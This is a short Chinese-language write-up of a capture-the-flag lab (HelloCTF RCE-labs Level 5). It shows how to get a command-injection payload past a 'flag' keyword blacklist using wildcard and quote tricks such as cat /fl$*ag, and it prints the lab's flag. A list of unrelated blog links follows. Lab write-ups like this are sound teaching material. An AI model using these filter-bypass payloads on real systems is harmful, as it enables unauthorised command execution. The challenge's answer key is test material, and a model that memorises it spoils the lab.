HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
oh-pinpin4 小时前
安全配置类
安全·web安全
ヽ格式化5 小时前
一文读懂栈与堆:从生活例子到Golang/PHP内存管理实践
golang·php·生活
骥龙5 小时前
4.12、隐私保护机器学习:联邦学习在安全数据协作中的应用
人工智能·安全·网络安全
c***97986 小时前
PHP在内容管理中的模板引擎
开发语言·php
Q_Q5110082856 小时前
python+django/flask的情绪宣泄系统
spring boot·python·pycharm·django·flask·node.js·php
用户7227868123446 小时前
PHP Fiber 优雅协作式多任务
php
青茶3608 小时前
ThinkCMF是一个开源的内容管理框架
php·cms·thinkphp
vx_vxbs669 小时前
【SSM电动车智能充电服务平台】(免费领源码+演示录像)|可做计算机毕设Java、Python、PHP、小程序APP、C#、爬虫大数据、单片机、文案
java·spring boot·mysql·spring cloud·小程序·php·idea
世界尽头与你9 小时前
Go pprof 调试信息泄露漏洞
安全·网络安全·golang·渗透测试
j***576810 小时前
电脑可以连接wifi,但是连接后仍然显示没有网络
网络·电脑·php